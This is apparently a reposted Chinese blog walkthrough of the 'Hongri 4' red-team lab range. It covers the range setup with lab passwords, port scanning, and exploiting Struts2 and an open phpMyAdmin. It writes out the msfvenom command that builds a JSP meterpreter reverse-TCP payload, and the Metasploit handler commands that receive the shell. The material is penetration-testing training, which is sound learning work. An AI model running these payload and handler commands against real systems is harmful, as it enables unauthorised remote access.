当前位置:   article > 正文

ATT&CK红队评估(红日靶场四)_红日靶场4

红日靶场4

靶场搭建

靶场下载地址:漏洞详情

共有三台主机DC、WEB、WIN7

机器密码

WEB主机 ubuntu:ubuntu

WIN7主机 douser:Dotest123

(DC)WIN2008主机 administrator:Test2008

网络配置

创建两个子网vmnet0和vmnet1

vmnet1:192.168.183.0

WEB主机网卡设置

WIN7主机网卡设置

DC主机网卡设置

攻击机kali的网卡和WEB主机的第一个出网网卡一致为NAT模式

WEB主机(Ubuntu)

DC主机(Windows 2008)

WIN7

WEB主机(Ubuntu)上启动环境

        sudo docker start ec 17 09 bb da 3d ab ad

渗透测试

扫描端口开放情况

nmap -sS -p 1-65535 -A 192.168.48.146

端口22开放,存在SSH服务

2001,2002,2003端口开放,存在WEB

看到2001使用了Struts2中间件

2002使用了Apache Tomcat中间件

2003为Apache、PHPmyadmin、mysql

访问WEB

2001端口

2002端口

2003端口,发现不需要密码就可以进入phpmyadmin后台

利用Struts2漏洞获得shell

使用了Struts2

直接使用工具进行检测和利用

利用漏洞上传msf马

生成msf马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp

msf启动监听

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 192.168.48.136

exploit

访问马

成功收到会话

利用phpmyadmin后台获得shell

还可以利用phpmyadmin来使用数据库日志写入马来获得会话,这里就不做演示了,方法和之前的红日靶场一的一样,可以前往查看。链接:

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/1019202
推荐阅读
相关标签
  

闽ICP备14008679号